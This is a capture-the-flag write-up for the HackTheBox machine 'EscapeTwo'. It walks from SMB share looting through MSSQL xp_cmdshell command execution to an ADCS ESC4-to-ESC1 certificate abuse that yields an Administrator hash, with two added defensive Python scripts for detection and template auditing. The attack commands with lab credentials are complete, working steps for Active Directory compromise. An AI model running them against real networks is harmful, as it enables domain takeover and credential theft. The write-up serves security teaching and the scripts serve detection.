Easy Windows ADCS
EscapeTwo.
Medium Windows ADCS ESC4 ESC1 MSSQL HackTheBox
Windows Active Directory machine centered around ADCS abuse. Starting with provided credentials, the path goes through SMB enumeration, MSSQL credential harvesting, and privilege escalation via an ESC4 → ESC1 attack chain to obtain a certificate as Administrator.
User Flag
c000416623xxxxxxxxxxxxxxxxxxxxxx
Root Flag
d3a61f5a28xxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Full port scan — classic AD DC profile. MSSQL on 1433 is uncommon on DCs and usually means credentials are stored somewhere.

nmap
$ nmap -sC -sV -oA scans/escapeTwo 10.129.232.128
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        DNS
88/tcp   open  kerberos-sec  Kerberos
135/tcp  open  msrpc
445/tcp  open  microsoft-ds  SMB
1433/tcp open  ms-sql-s      MSSQL
3268/tcp open  ldap          LDAP (Global Catalog)
5985/tcp open  wsman         WinRM
9389/tcp open  mc-nmf        AD Web Services
02 Foothold — SMB → MSSQL

Starting credentials were provided: rose:KxEPkKe6R8su. Enumerate SMB shares first.

SMB enumeration
$ netexec smb 10.129.232.128 -u rose -p 'KxEPkKe6R8su' --shares
SHARE: Accounting Department    READ
$ smbclient '//10.129.232.128/Accounting Department' -U 'rose%KxEPkKe6R8su'
smb: \> get accounts.xlsx
smb: \> get corporate.xlsx
finding: spreadsheets contain employee account listings — including sa (SQL Server) credentials.

Connect to MSSQL with the extracted sa credentials and enable command execution.

MSSQL — xp_cmdshell
$ impacket-mssqlclient sequel.htb/sa:'REGGIE1234ronnie'@10.129.232.128
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';
sequel\sql_svc
creds found: enumerating config files and the registry via xp_cmdshell surfaces ryan : WqSZAF6CysDQbGb3
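From the server side, the xp_cmdshell enablement above is noisy: every sp_configure change that RECONFIGURE applies is written to the SQL Server ERRORLOG as a "Configuration option '…' changed from X to Y" line, and xp_cmdshell can only be switched on after 'show advanced options' has been. As an added example (not part of the original writeup), this Python parses a constructed ERRORLOG excerpt, flags high-risk options being turned on, and notes whether the same session primed 'show advanced options' first; the log lines and session ids are sample data, not output from the machine.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed ERRORLOG excerpt (sample data, not from the target). The
# "Configuration option ... changed" wording is what SQL Server writes when
# sp_configure is run and RECONFIGURE applied.
SAMPLE_ERRORLOG = """\
2025-01-12 10:14:03.21 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-12 10:14:03.25 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-12 10:20:44.90 spid52      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2025-01-12 11:02:17.03 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enablement hands a SQL login code execution on the host OS.
HIGH_RISK_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


@dataclass(frozen=True)
class ConfigChange:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int

    @property
    def enables_high_risk(self) -> bool:
        """True when a high-risk option goes from off to on."""
        return self.option in HIGH_RISK_OPTIONS and self.old == 0 and self.new != 0


def parse_config_changes(errorlog: str) -> list[ConfigChange]:
    """Extract every sp_configure change recorded in an ERRORLOG excerpt."""
    changes: list[ConfigChange] = []
    for line in errorlog.splitlines():
        m = LINE_RE.match(line)
        if m:
            changes.append(
                ConfigChange(m["ts"], m["spid"], m["option"], int(m["old"]), int(m["new"]))
            )
    return changes


def high_risk_enablements(errorlog: str) -> list[tuple[ConfigChange, bool]]:
    """High-risk options switched on, paired with whether the same session
    turned on 'show advanced options' earlier (the usual precursor)."""
    changes = parse_config_changes(errorlog)
    hits: list[tuple[ConfigChange, bool]] = []
    for i, change in enumerate(changes):
        if not change.enables_high_risk:
            continue
        primed = any(
            prev.spid == change.spid
            and prev.option == "show advanced options"
            and prev.new != 0
            for prev in changes[:i]
        )
        hits.append((change, primed))
    return hits


if __name__ == "__main__":
    for change, primed in high_risk_enablements(SAMPLE_ERRORLOG):
        tag = "after 'show advanced options'" if primed else "without priming"
        print(f"{change.timestamp} {change.spid}: '{change.option}' enabled ({tag})")
```

The disabling line at the end of the sample is deliberately not flagged: turning xp_cmdshell back off is cleanup, and a detection that fires on both directions trains analysts to ignore it.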
03 Lateral Movement — WinRM as ryan

Ryan's credentials work over WinRM. User flag is on the desktop.

evil-winrm
$ evil-winrm -i 10.129.232.128 -u ryan -p 'WqSZAF6CysDQbGb3'
*Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt
HTB{...}
04 Privilege Escalation — ADCS ESC4 → ESC1

Enumerate vulnerable certificate templates with Certipy.

certipy — find vulnerable templates
$ certipy-ad find -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -dc-ip 10.129.232.128 -vulnerable -stdout
Template: DunderMifflinAuthentication
  ESC4 — ryan has write permissions on template object
  SubjectAltRequireDns: True (blocks direct ESC1 — must modify template first)
ESC4 alone isn't the end — it's the primitive that enables ESC1. The actual exploit is: write template → request cert → authenticate.

Step 1 — Take control of ca_svc (the account with enrollment rights on the template). Ryan has GenericWrite over it.

owneredit + dacledit + password reset
$ impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
$ net rpc password "ca_svc" "newP@ssword" -U "sequel.htb"/"ryan"%"WqSZAF6CysDQbGb3" -S 10.129.232.128

Step 2 — Back up, then overwrite the template with ESC1 conditions

certipy — ESC4 abuse
# backup original template
$ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -save-configuration DunderMifflinAuthentication.json.bak
# write ESC1-vulnerable config (sets CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
$ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -write-default-configuration
Template now: Enrollee Supplies Subject: True → ESC1 flagged

Step 3 — Request a certificate as Administrator, authenticate, get the hash

certipy req + auth → NT hash
$ certipy-ad req -u 'ca_svc@sequel.htb' -p 'newP@ssword' -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb -dc-ip 10.129.232.128
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Saved to 'administrator.pfx'
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip 10.129.232.128
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404ee...:7a8d4e00f75e5a0b3ff...
shell as Administrator
$ evil-winrm -i 10.129.232.128 -u administrator -H '7a8d4e00f75e5a0b3ff...'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
d3a61f5a28xxxxxxxxxxxxxxxxxxxxxx

Step 4 — Restore the template

certipy — restore template
$ certipy-ad template -u 'ca_svc@sequel.htb' -p 'newP@ssword' -template DunderMifflinAuthentication -dc-ip 10.129.232.128 -write-configuration DunderMifflinAuthentication.json.bak -force
good habit: always restore modified templates post-exploitation. In a real engagement this is critical; on HTB the machine resets anyway.
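The certipy find output, the ESC4 overwrite and the restore step are all about the same two LDAP attributes on the template object: msPKI-Certificate-Name-Flag (where CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and CT_FLAG_SUBJECT_ALT_REQUIRE_DNS live) and msPKI-Enrollment-Flag (manager approval). As an added example that is not part of the writeup or of Certipy, this Python evaluates the ESC1 preconditions on a template's attributes, decodes the name-flag bits, and diffs a saved backup against the live object, which is how a PKI audit would catch the overwrite and how a restore is verified. The BEFORE/AFTER dicts are constructed to mirror the states described above (DNS-required, then enrollee-supplies-subject), not dumps of the real template, and the low_priv_enroll field is a simplification of parsing the template's nTSecurityDescriptor.

```python
from __future__ import annotations

# msPKI-Certificate-Name-Flag bits, from MS-CRTD section 2.28.
NAME_FLAGS = {
    "CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT": 0x00000001,
    "CT_FLAG_SUBJECT_ALT_REQUIRE_UPN": 0x02000000,
    "CT_FLAG_SUBJECT_ALT_REQUIRE_DNS": 0x08000000,
    "CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME": 0x40000000,
}
# msPKI-Enrollment-Flag bit meaning "manager approval required" (MS-CRTD 2.26).
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let the issued certificate be used for domain logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}


def set_name_flags(name_flag: int) -> list[str]:
    """Names of the msPKI-Certificate-Name-Flag bits that are set."""
    return [name for name, bit in NAME_FLAGS.items() if name_flag & bit]


def esc1_conditions(tmpl: dict) -> dict[str, bool]:
    """Each ESC1 precondition, evaluated on one template's attributes."""
    name_flag = tmpl["msPKI-Certificate-Name-Flag"]
    enroll_flag = tmpl["msPKI-Enrollment-Flag"]
    ekus = set(tmpl.get("pKIExtendedKeyUsage", []))
    return {
        "enrollee_supplies_subject": bool(
            name_flag & NAME_FLAGS["CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT"]
        ),
        # An empty EKU list is treated as unrestricted, i.e. usable for logon.
        "authentication_eku": (not ekus) or bool(ekus & AUTH_EKUS),
        "no_manager_approval": not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_authorized_signatures": tmpl.get("msPKI-RA-Signature", 0) == 0,
        # Simplification (assumed input field): whether a low-privilege
        # principal holds Enroll rights. A real audit derives this from the
        # template's nTSecurityDescriptor.
        "low_priv_enrollment": bool(tmpl.get("low_priv_enroll", False)),
    }


def is_esc1(tmpl: dict) -> bool:
    """ESC1 applies only when every precondition holds at once."""
    return all(esc1_conditions(tmpl).values())


def template_drift(saved: dict, live: dict) -> dict[str, tuple]:
    """Attributes whose value differs between a saved backup and the live object."""
    return {
        key: (saved.get(key), live.get(key))
        for key in sorted(set(saved) | set(live))
        if saved.get(key) != live.get(key)
    }


# Constructed attribute sets mirroring the writeup's before/after states
# (sample values, not a dump of the real template).
BEFORE = {
    "name": "DunderMifflinAuthentication",
    "msPKI-Certificate-Name-Flag": NAME_FLAGS["CT_FLAG_SUBJECT_ALT_REQUIRE_DNS"]
    | NAME_FLAGS["CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME"],
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "low_priv_enroll": True,
}
# After the overwrite: the subject is now supplied by the enrollee.
AFTER = {
    **BEFORE,
    "msPKI-Certificate-Name-Flag": NAME_FLAGS["CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT"],
}

if __name__ == "__main__":
    for label, tmpl in (("before", BEFORE), ("after", AFTER)):
        flags = set_name_flags(tmpl["msPKI-Certificate-Name-Flag"])
        print(f"{label}: {flags} ESC1={is_esc1(tmpl)}")
    print("drift vs backup:", template_drift(BEFORE, AFTER))
    print("drift after restore:", template_drift(BEFORE, BEFORE))
```

Run against the backup file from Step 2 and a fresh LDAP read of the template, an empty drift result is the proof that Step 4 actually put the object back; a non-empty one on a template nobody changed on purpose is the ESC4 write itself.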
05 Attack Chain Summary
full chain
rose:KxEPkKe6R8su (given)
  │
  ▼
SMB → accounts.xlsx → sa credentials
  │
  ▼
MSSQL xp_cmdshell → sql_svc → ryan credentials
  │
  ▼
WinRM as ryan → user.txt ✓
  │
  ▼
ryan GenericWrite → ca_svc owneredit + dacledit + password reset
  │
  ▼
ca_svc write perms on DunderMifflinAuthentication (ESC4)
write-default-configuration → introduces ESC1
  │
  ▼
certipy req -upn administrator@sequel.htb → administrator.pfx
  │
  ▼
certipy auth → NT hash → evil-winrm → root.txt ✓
key takeaways:
· ESC4 gives template write access — the actual exploit is the write → request → auth chain into ESC1
· certipy-ad template -write-default-configuration is the clean v5 way to push ESC1 conditions
· CERTSRV_E_SUBJECT_DNS_REQUIRED comes from a template-level flag (SubjectAltRequireDns), not a CA-level setting — fix it by modifying the template